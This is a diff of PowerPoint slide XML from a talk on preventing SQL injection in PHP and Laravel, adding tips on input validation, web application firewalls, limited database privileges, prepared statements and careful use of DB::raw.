-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>Check/Change </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="2200" dirty="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>input </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>type: </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="2200" dirty="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>is_numeric</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>(), </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="2200" dirty="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>settype</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>()</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
-              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-              <a:buChar char="•"/>
-            </a:pPr>
-            <a:endParaRPr lang="en-US" i="1" dirty="0">
-              <a:solidFill>
-                <a:schemeClr val="tx1"/>
-              </a:solidFill>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr marL="342900" indent="-342900" algn="l">
-              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-              <a:buChar char="•"/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" b="1" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="0070C0"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>W</a:t>
+              <a:t>Be careful with </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                 <a:solidFill>
-                  <a:srgbClr val="0070C0"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>eb app firewall</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0">
-              <a:solidFill>
-                <a:schemeClr val="tx1"/>
-              </a:solidFill>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
-              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-              <a:buChar char="•"/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-                <a:hlinkClick r:id="rId3"/>
-              </a:rPr>
-              <a:t>ModSecurity</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>, </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-                <a:hlinkClick r:id="rId4"/>
-              </a:rPr>
-              <a:t>Imperva</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" sz="2200" dirty="0" smtClean="0">
-              <a:solidFill>
-                <a:schemeClr val="tx1"/>
-              </a:solidFill>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
-              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-              <a:buChar char="•"/>
-            </a:pPr>
-            <a:endParaRPr lang="en-US" sz="2200" dirty="0" smtClean="0">
-              <a:solidFill>
-                <a:schemeClr val="tx1"/>
-              </a:solidFill>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr marL="342900" indent="-342900" algn="l">
-              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-              <a:buChar char="•"/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:srgbClr val="0070C0"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>Limited privileges</a:t>
+                  <a:srgbClr val="0000FF"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>DB::raw </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0" smtClean="0">
@@ -17039,114 +17362,8 @@
                   <a:schemeClr val="tx1"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t> </a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
-              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-              <a:buChar char="•"/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>Never </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="2200" dirty="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>connect to </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>DB as </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>super </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>user</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
-              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-              <a:buChar char="•"/>
-            </a:pPr>
-            <a:endParaRPr lang="en-US" sz="2200" dirty="0" smtClean="0">
-              <a:solidFill>
-                <a:schemeClr val="tx1"/>
-              </a:solidFill>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr marL="342900" indent="-342900" algn="l">
-              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-              <a:buChar char="•"/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" b="1" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="0070C0"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>Avoid constructing SQL queries with user input</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0">
-              <a:solidFill>
-                <a:srgbClr val="0070C0"/>
-              </a:solidFill>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
-              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-              <a:buChar char="•"/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" sz="2200" dirty="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>Use </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>SQL variable binding &amp; prepared statements</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr algn="l"/>
-            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
-              <a:solidFill>
-                <a:schemeClr val="tx1"/>
-              </a:solidFill>
-            </a:endParaRPr>
+              <a:t>query</a:t>
+            </a:r>
           </a:p>
           <a:p>
             <a:pPr marL="342900" indent="-342900" algn="l">
@@ -17181,12 +17398,98 @@
               </a:solidFill>
             </a:endParaRPr>
           </a:p>
+          <a:p>
+            <a:pPr marL="342900" indent="-342900" algn="l">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+            </a:pPr>
+            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
+              <a:solidFill>
+                <a:schemeClr val="tx1"/>
+              </a:solidFill>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr marL="342900" indent="-342900" algn="l">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>Wrong</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t> way</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0">
+              <a:solidFill>
+                <a:schemeClr val="tx1"/>
+              </a:solidFill>
+            </a:endParaRPr>
+          </a:p>
         </p:txBody>
       </p:sp>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="6" name="Picture 5"/>
+          <p:cNvPicPr>
+            <a:picLocks noChangeAspect="1"/>
+          </p:cNvPicPr>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId3"/>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="191928" y="2853504"/>
+            <a:ext cx="8795634" cy="756961"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+      </p:pic>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="10" name="Picture 9"/>
+          <p:cNvPicPr>
+            <a:picLocks noChangeAspect="1"/>
+          </p:cNvPicPr>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId4"/>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="191928" y="4911365"/>
+            <a:ext cx="8795634" cy="1414021"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+      </p:pic>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1310789644"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2746909854"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -17259,7 +17562,7 @@
                 </a:solidFill>
               </a:rPr>
               <a:pPr/>
-              <a:t>Tuesday, April 28, 2015</a:t>
+              <a:t>Wednesday, May 06, 2015</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US" dirty="0">
               <a:solidFill>
@@ -18046,7 +18349,7 @@
                 </a:solidFill>
               </a:rPr>
               <a:pPr/>
-              <a:t>Tuesday, April 28, 2015</a:t>
+              <a:t>Wednesday, May 06, 2015</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US" dirty="0">
               <a:solidFill>
@@ -18140,7 +18443,7 @@
         </p:nvSpPr>
         <p:spPr bwMode="auto">
           <a:xfrm>
-            <a:off x="125944" y="1018034"/>
+            <a:off x="88232" y="1027460"/>
             <a:ext cx="8720218" cy="1143000"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
@@ -18292,11 +18595,18 @@
           </a:lstStyle>
           <a:p>
             <a:r>
+              <a:rPr lang="en-US" sz="4000" dirty="0" err="1" smtClean="0">
+                <a:latin typeface="Constantia"/>
+                <a:cs typeface="Constantia"/>
+              </a:rPr>
+              <a:t>Laravel</a:t>
+            </a:r>
+            <a:r>
               <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0">
                 <a:latin typeface="Constantia"/>
                 <a:cs typeface="Constantia"/>
               </a:rPr>
-              <a:t>Demo</a:t>
+              <a:t> (inside the core)</a:t>
             </a:r>
             <a:endParaRPr lang="en-US" sz="4000" dirty="0">
               <a:latin typeface="Constantia"/>
@@ -18315,8 +18625,8 @@
         </p:nvSpPr>
         <p:spPr bwMode="auto">
           <a:xfrm>
-            <a:off x="457200" y="2547533"/>
-            <a:ext cx="8229600" cy="3361133"/>
+            <a:off x="191928" y="2161034"/>
+            <a:ext cx="8671710" cy="4369962"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -18510,27 +18820,97 @@
               <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
               <a:buChar char="•"/>
             </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-                <a:hlinkClick r:id="rId3"/>
-              </a:rPr>
-              <a:t>Index.php</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" i="1" dirty="0" smtClean="0">
+            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
               <a:solidFill>
-                <a:schemeClr val="tx1"/>
+                <a:srgbClr val="0000FF"/>
               </a:solidFill>
             </a:endParaRPr>
           </a:p>
+          <a:p>
+            <a:pPr marL="342900" indent="-342900" algn="l">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+            </a:pPr>
+            <a:endParaRPr lang="en-US" dirty="0">
+              <a:solidFill>
+                <a:srgbClr val="0000FF"/>
+              </a:solidFill>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr marL="342900" indent="-342900" algn="l">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+            </a:pPr>
+            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
+              <a:solidFill>
+                <a:srgbClr val="0000FF"/>
+              </a:solidFill>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr marL="342900" indent="-342900" algn="l">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+            </a:pPr>
+            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
+              <a:solidFill>
+                <a:srgbClr val="0000FF"/>
+              </a:solidFill>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr marL="342900" indent="-342900" algn="l">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+            </a:pPr>
+            <a:endParaRPr lang="en-US" dirty="0">
+              <a:solidFill>
+                <a:srgbClr val="0000FF"/>
+              </a:solidFill>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr marL="342900" indent="-342900" algn="l">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+            </a:pPr>
+            <a:endParaRPr lang="en-US" dirty="0">
+              <a:solidFill>
+                <a:srgbClr val="0000FF"/>
+              </a:solidFill>
+            </a:endParaRPr>
+          </a:p>
         </p:txBody>
       </p:sp>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="8" name="Picture 7"/>
+          <p:cNvPicPr>
+            <a:picLocks noChangeAspect="1"/>
+          </p:cNvPicPr>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId3"/>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="191928" y="2051124"/>
+            <a:ext cx="8796861" cy="4255407"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+      </p:pic>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="167973777"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1403241992"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -18603,7 +18983,7 @@
                 </a:solidFill>
               </a:rPr>
               <a:pPr/>
-              <a:t>Tuesday, April 28, 2015</a:t>
+              <a:t>Wednesday, May 06, 2015</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US" dirty="0">
               <a:solidFill>
@@ -18697,7 +19077,7 @@
         </p:nvSpPr>
         <p:spPr bwMode="auto">
           <a:xfrm>
-            <a:off x="125944" y="1018034"/>
+            <a:off x="88232" y="1027460"/>
             <a:ext cx="8720218" cy="1143000"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
@@ -18849,11 +19229,11 @@
           </a:lstStyle>
           <a:p>
             <a:r>
-              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0">
+              <a:rPr lang="en-US" sz="4000" dirty="0" err="1" smtClean="0">
                 <a:latin typeface="Constantia"/>
                 <a:cs typeface="Constantia"/>
               </a:rPr>
-              <a:t>Demo</a:t>
+              <a:t>Laravel</a:t>
             </a:r>
             <a:endParaRPr lang="en-US" sz="4000" dirty="0">
               <a:latin typeface="Constantia"/>
@@ -18872,8 +19252,8 @@
         </p:nvSpPr>
         <p:spPr bwMode="auto">
           <a:xfrm>
-            <a:off x="457200" y="2547533"/>
-            <a:ext cx="8229600" cy="3361133"/>
+            <a:off x="191928" y="2161034"/>
+            <a:ext cx="8671710" cy="4369962"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -19068,15 +19448,33 @@
               <a:buChar char="•"/>
             </a:pPr>
             <a:r>
-              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-                <a:hlinkClick r:id="rId3"/>
-              </a:rPr>
-              <a:t>Index2.php</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" i="1" dirty="0" smtClean="0">
+              <a:rPr lang="en-US" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:cs typeface="Constantia"/>
+              </a:rPr>
+              <a:t>The </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" b="1" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="0000FF"/>
+                </a:solidFill>
+                <a:cs typeface="Constantia"/>
+              </a:rPr>
+              <a:t>right</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:cs typeface="Constantia"/>
+              </a:rPr>
+              <a:t> way</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0">
               <a:solidFill>
                 <a:schemeClr val="tx1"/>
               </a:solidFill>
@@ -19084,10 +19482,34 @@
           </a:p>
         </p:txBody>
       </p:sp>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="10" name="Picture 9"/>
+          <p:cNvPicPr>
+            <a:picLocks noChangeAspect="1"/>
+          </p:cNvPicPr>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId3"/>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="191928" y="2989436"/>
+            <a:ext cx="8795634" cy="2374413"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+      </p:pic>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3334160463"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1655292013"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -19160,7 +19582,7 @@
                 </a:solidFill>
               </a:rPr>
               <a:pPr/>
-              <a:t>Tuesday, April 28, 2015</a:t>
+              <a:t>Wednesday, May 06, 2015</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US" dirty="0">
               <a:solidFill>
@@ -19254,7 +19676,7 @@
         </p:nvSpPr>
         <p:spPr bwMode="auto">
           <a:xfrm>
-            <a:off x="125944" y="1018034"/>
+            <a:off x="125944" y="857775"/>
             <a:ext cx="8720218" cy="1143000"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
@@ -19410,7 +19832,7 @@
                 <a:latin typeface="Constantia"/>
                 <a:cs typeface="Constantia"/>
               </a:rPr>
-              <a:t>Demo</a:t>
+              <a:t>Tips</a:t>
             </a:r>
             <a:endParaRPr lang="en-US" sz="4000" dirty="0">
               <a:latin typeface="Constantia"/>
@@ -19429,8 +19851,8 @@
         </p:nvSpPr>
         <p:spPr bwMode="auto">
           <a:xfrm>
-            <a:off x="457200" y="2547533"/>
-            <a:ext cx="8229600" cy="3361133"/>
+            <a:off x="457200" y="1781667"/>
+            <a:ext cx="8229600" cy="4721048"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -19625,15 +20047,310 @@
               <a:buChar char="•"/>
             </a:pPr>
             <a:r>
-              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
+              <a:rPr lang="en-US" b="1" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="0070C0"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>Validation first </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>(mail, phone,… types)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>Check/Change </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="2200" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>input </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>type: </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="2200" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>is_numeric</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>(), </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="2200" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>settype</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>()</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+            </a:pPr>
+            <a:endParaRPr lang="en-US" i="1" dirty="0">
+              <a:solidFill>
+                <a:schemeClr val="tx1"/>
+              </a:solidFill>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr marL="342900" indent="-342900" algn="l">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" b="1" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="0070C0"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>W</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:srgbClr val="0070C0"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>eb app firewall</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0">
+              <a:solidFill>
+                <a:schemeClr val="tx1"/>
+              </a:solidFill>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                 <a:solidFill>
                   <a:schemeClr val="tx1"/>
                 </a:solidFill>
                 <a:hlinkClick r:id="rId3"/>
               </a:rPr>
-              <a:t>Index3.php</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" i="1" dirty="0" smtClean="0">
+              <a:t>ModSecurity</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:hlinkClick r:id="rId4"/>
+              </a:rPr>
+              <a:t>Imperva</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" sz="2200" dirty="0" smtClean="0">
+              <a:solidFill>
+                <a:schemeClr val="tx1"/>
+              </a:solidFill>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+            </a:pPr>
+            <a:endParaRPr lang="en-US" sz="2200" dirty="0" smtClean="0">
+              <a:solidFill>
+                <a:schemeClr val="tx1"/>
+              </a:solidFill>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr marL="342900" indent="-342900" algn="l">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:srgbClr val="0070C0"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>Limited privileges</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t> </a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>Never </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="2200" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>connect to </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>DB as super user</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+            </a:pPr>
